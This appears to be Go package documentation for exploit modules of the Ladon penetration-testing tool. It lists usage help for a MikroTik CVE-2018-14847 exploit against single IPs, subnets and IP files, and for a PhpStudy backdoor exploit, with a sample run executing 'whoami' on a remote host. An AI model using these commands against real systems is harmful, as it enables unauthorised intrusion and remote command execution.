Documentation ¶
Index ¶
Constants ¶
This section is empty.
Variables ¶
View Source
var Cve2018_14847Help = func() { fmt.Println("Usage: Ladon CVE-2018-14847 ip port") fmt.Println("Example:") fmt.Println("Ladon CVE-2018-14847 192.168.1.8 8291") fmt.Println("Ladon 192.168.1.8/24 CVE-2018-14847") fmt.Println("Ladon 192.168.1.8/b CVE-2018-14847") fmt.Println("Ladon ip.txt CVE-2018-14847") }
View Source
var PhpStudyDoorHelp = func() { fmt.Println("Usage: Ladon PhpStudyDoor url cmd") fmt.Println("Example: Ladon PhpStudyDoor http://192.168.1.8 whoami") }
Functions ¶
func Cve2018_14847Exp ¶
func Cve2018_14847Exp(ip, port string)
func PhpStudyDoorExp ¶
func PhpStudyDoorExp(url, cmdline string)
go run phpstudydoor.go http://192.168.1.21 whoami win7\k8gege
Types ¶
This section is empty.
Click to show internal directories.
Click to hide internal directories.